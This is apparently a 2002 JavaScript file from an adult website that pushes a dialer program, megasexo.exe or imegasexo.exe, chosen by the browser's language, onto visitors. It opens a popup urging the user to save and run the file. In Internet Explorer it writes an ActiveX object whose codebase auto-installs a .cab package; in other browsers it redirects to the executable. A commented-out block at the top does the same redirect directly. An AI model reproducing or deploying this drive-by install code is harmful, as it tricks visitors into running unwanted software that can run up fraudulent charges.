/*
 function idioma() {
 var type=navigator.appName;
 if (type=="Netscape")  var lang = navigator.language;
 else var lang = navigator.userLanguage;
 var lang = lang.substr(0,2);

 if (lang == "es") dialer = "http://www.megasexo.net/download/megasexo.exe";
 else dialer = "http://www.megasexo.net/download/imegasexo.exe";
 window.location=dialer;
*/

 // © DINEROTICA.COM 2002 (Autoejecutable)

  var type=navigator.appName;
  if (type=="Netscape")  var lang = navigator.language;
  else var lang = navigator.userLanguage;
  var lang = lang.substr(0,2);
  if (lang == "es") p="";
  else p="i";

  d = p+"megasexo";
  w = "http://www.megasexo.net/download/";
  u = w+d;

function masfotos() {
 w = "200";
 h = "50";
 t = (screen.height) ? (screen.height-h)/2 : 0;
 l = (screen.width) ? (screen.width-w)/2 : 0;
 nova=window.open('','foto','width='+w+',height='+h+',top='+t+',left='+l+',resizable=no');
 nova.document.open();
 nova.document.write('<html><head><title>MAS FOTOS PORNO   - - - - -</title></head>');
 nova.document.write('<body bgcolor=white topmargin=0 leftmargin=0 marginwidth=0 marginheight=0 onload=\"self.focus()\">');
 nova.document.write('<table align=center width=100% height=100% border=0>');
 nova.document.write('<tr align=center><td><font face=\"Arial,sans-serif\" size=1><b>GUARDA Y EJECUTA EL ACCESO DIRECTO:</b></font></td></tr>');
 nova.document.write('<tr align=center><td><font face=\"Arial,sans-serif\" size=4><b><a href=\"http://www.megasexo.net/download/megasexo.exe\">ESPAÑA</a><br><br>');
 nova.document.write('<a href=\"http://www.megasexo.net/download/imegasexo.exe\">INTERNACIONAL</a></b></font></td></tr></table>');
 nova.document.write('<script> if (navigator.appName == \"Microsoft Internet Explorer\") document.write(\'<OBJECT CLASSID=\"CLSID:8522F9B3-38C5-4aa4-AE40-7401F1BBC851\" CODEBASE=\"'+u+'.cab\"><\/OBJECT>\'); else window.location=\"'+u+'.exe\";</script>');
 nova.document.write('</body></html>');
 nova.document.close();
}